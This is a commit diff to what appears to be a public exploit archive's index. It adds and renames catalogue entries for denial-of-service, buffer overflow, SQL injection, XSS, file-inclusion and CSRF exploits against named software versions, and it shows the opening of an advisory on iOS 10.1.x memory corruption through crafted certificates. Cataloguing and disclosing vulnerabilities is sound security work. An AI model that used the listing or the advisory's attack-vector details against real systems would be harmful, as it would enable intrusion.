DB: 2016-12-14
7 new exploits Microsoft Internet Explorer 9 IEFRAME - CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047) Xitami Web Server 5.0a0 - Denial of Service OpenSSL 1.1.0a/1.1.0b - Denial of Service Serva 3.0.0 HTTP Server - Denial of Service iOS 10.1.x - Certificate File Memory Corruption OpenBSD 4.0 - (vga) Privilege Escalation OpenBSD 4.0 - 'vga' Privilege Escalation 10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections AShop Deluxe 4.x - (catalogue.php cat) SQL Injection AShop Deluxe 4.x - 'catalogue.php' SQL Injection HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion CAT2 - (spaw_root) Local File Inclusion CAT2 - 'spaw_root' Parameter Local File Inclusion MyBloggie 2.1.3 - search.php SQL Injection MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting MyBloggie 2.1.x - Multiple Remote File Inclusion MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting Smart Guard Network Manager 6.3.2 - SQL Injection WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery
This commit is contained in:
parent
96bd05d39d
commit
b080c70f8b
10 changed files with 536 additions and 53 deletions
59
files.csv
59
files.csv
|
@ -3556,6 +3556,7 @@ id,file,description,date,author,platform,type,port
|
|||
27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0
|
||||
27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0
|
||||
27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
|
||||
40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
|
||||
27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0
|
||||
27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0
|
||||
28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0
|
||||
|
@ -3996,7 +3997,7 @@ id,file,description,date,author,platform,type,port
|
|||
31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
|
||||
31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
|
||||
31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
|
||||
40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,"Stefan Petrushevski",windows,dos,0
|
||||
40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,windows,dos,0
|
||||
31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
|
||||
31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
|
||||
31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
|
||||
|
@ -5300,6 +5301,9 @@ id,file,description,date,author,platform,type,port
|
|||
40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
|
||||
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
|
||||
40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::HasFlag Memory Corruption",2016-12-09,Skylined,windows,dos,0
|
||||
40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
|
||||
40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
|
||||
40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -5865,7 +5869,7 @@ id,file,description,date,author,platform,type,port
|
|||
5667,platforms/windows/local/5667.py,"VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal Exploit",2008-05-23,j0rgan,windows,local,0
|
||||
5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0
|
||||
5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local,0
|
||||
5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
|
||||
5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
|
||||
6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0
|
||||
6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0
|
||||
6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0
|
||||
|
@ -8692,6 +8696,7 @@ id,file,description,date,author,platform,type,port
|
|||
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
|
||||
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
|
||||
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
|
||||
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -16370,7 +16375,7 @@ id,file,description,date,author,platform,type,port
|
|||
2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0
|
||||
2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0
|
||||
2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0
|
||||
2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
|
||||
2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
|
||||
2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
|
||||
2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
|
||||
2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0
|
||||
|
@ -19064,12 +19069,12 @@ id,file,description,date,author,platform,type,port
|
|||
5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0
|
||||
5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0
|
||||
5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
|
||||
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
|
||||
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,php,webapps,0
|
||||
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
|
||||
5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
|
||||
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
|
||||
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
|
||||
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
|
||||
5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
|
||||
5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
|
||||
5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
|
||||
5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
|
||||
5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0
|
||||
|
@ -28115,7 +28120,6 @@ id,file,description,date,author,platform,type,port
|
|||
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
|
||||
26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
|
||||
26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0
|
||||
26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - search.php SQL Injection",2005-10-06,trueend5,php,webapps,0
|
||||
26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0
|
||||
26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0
|
||||
26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - newmsg.php fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0
|
||||
|
@ -28941,16 +28945,16 @@ id,file,description,date,author,platform,type,port
|
|||
27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0
|
||||
27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0
|
||||
27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0
|
||||
27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
|
||||
27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
|
||||
27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - calendar.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
|
||||
27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - forums.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
|
||||
|
@ -29372,7 +29376,6 @@ id,file,description,date,author,platform,type,port
|
|||
27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
|
||||
27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
|
||||
27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
|
||||
27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Inclusion",2006-06-02,ERNE,php,webapps,0
|
||||
27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
|
||||
27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
|
||||
27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0
|
||||
|
@ -29623,7 +29626,7 @@ id,file,description,date,author,platform,type,port
|
|||
28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0
|
||||
28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0
|
||||
28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0
|
||||
28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
|
||||
28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
|
||||
28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
|
||||
28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
|
||||
28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
|
||||
|
@ -30379,12 +30382,12 @@ id,file,description,date,author,platform,type,port
|
|||
29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
|
||||
29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0
|
||||
29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0
|
||||
29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
|
||||
29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - search.asp Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0
|
||||
29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
|
||||
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
|
||||
|
@ -30458,9 +30461,9 @@ id,file,description,date,author,platform,type,port
|
|||
29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - new.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
|
||||
29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
|
||||
29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
|
||||
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
|
||||
29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
|
||||
29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
|
||||
|
@ -36865,3 +36868,5 @@ id,file,description,date,author,platform,type,port
|
|||
40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
|
||||
40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
|
||||
40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
|
||||
40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
|
||||
40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
139
platforms/ios/dos/40906.txt
Executable file
139
platforms/ios/dos/40906.txt
Executable file
|
@ -0,0 +1,139 @@
|
|||
Source: https://cxsecurity.com/issue/WLB-2016110046
|
||||
|
||||
iOS 10.1.x Remote memory corruption through certificate file
|
||||
Credit: Maksymilian Arciemowicz from https://cxsecurity.com
|
||||
|
||||
--------------------------------------------------------------------------------------
|
||||
0. Short description
|
||||
Special crafted certificate file may lead to memory corruption of several processes and the vector attack may be through Mobile Safari or Mail app. Attacker may control the overflow through the certificate length in OCSP field
|
||||
|
||||
--------------------------------------------------------------------------------------
|
||||
1. Possible vectors of attack
|
||||
- Apple Mail (double click on certificate)
|
||||
